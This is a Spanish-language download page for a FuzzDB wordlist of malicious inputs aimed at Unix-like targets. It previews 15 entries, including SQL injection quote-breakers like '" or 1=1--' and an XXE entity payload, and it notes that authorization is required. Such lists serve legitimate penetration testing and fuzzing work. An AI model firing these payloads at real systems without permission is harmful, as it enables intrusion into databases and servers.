Unix Attack Fuzz Strings (FuzzDB)
Amplia muestra de entradas maliciosas para objetivos tipo Unix que combina rompedores de comillas de SQLi, cadenas de formato, XXE y vectores de inyección de comandos procedentes de FuzzDB.
- Tamaño
- 13 KB
- Categoría
- Fuzzing
- Fuente
- danielmiessler/SecLists
- Licencia
- MIT
- Herramientas recomendadas
- wfuzzffufburp
Vista previa
Las primeras 15 entradas. Descarga o copia la lista completa (13 KB) con los botones de arriba.
# a wide sample of malicious input for unix-like targets
!
!'
!@#$%%^#$%#$@#$%$$@#$%^^**(()
!@#0%^#0##018387@#0^^**(()
"
" or "a"="a
" or "x"="x
" or 0=0 #
" or 0=0 --
" or 1=1 or ""="
" or 1=1--
"' or 1 --'"
") or ("a"="a
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////dev/random"">]><foo>&xxe;</foo>"Amplia muestra de entradas maliciosas para objetivos tipo Unix que combina rompedores de comillas de SQLi, cadenas de formato, XXE y vectores de inyección de comandos procedentes de FuzzDB.
Esta lista está orientada al fuzzing de entradas y al descubrimiento de vulnerabilidades. Contiene aproximadamente 13 KB y combina bien con herramientas como wfuzz, ffuf, burp. Elige la lista más pequeña que se ajuste a tu trabajo: las listas más cortas son más rápidas y más silenciosas para ataques en línea, mientras que las listas más grandes ofrecen mayor cobertura para el trabajo sin conexión, donde la velocidad es una restricción menor.
Puedes copiar la vista previa de muestra directamente desde esta página, copiar la lista completa a
tu portapapeles o descargar el archivo .txt en bruto. La lista completa se sirve directamente
desde su fuente original en GitHub.
Obtenido de danielmiessler/SecLists y distribuido bajo MIT. Usa las listas de palabras únicamente contra sistemas para los que tengas autorización explícita de realizar pruebas.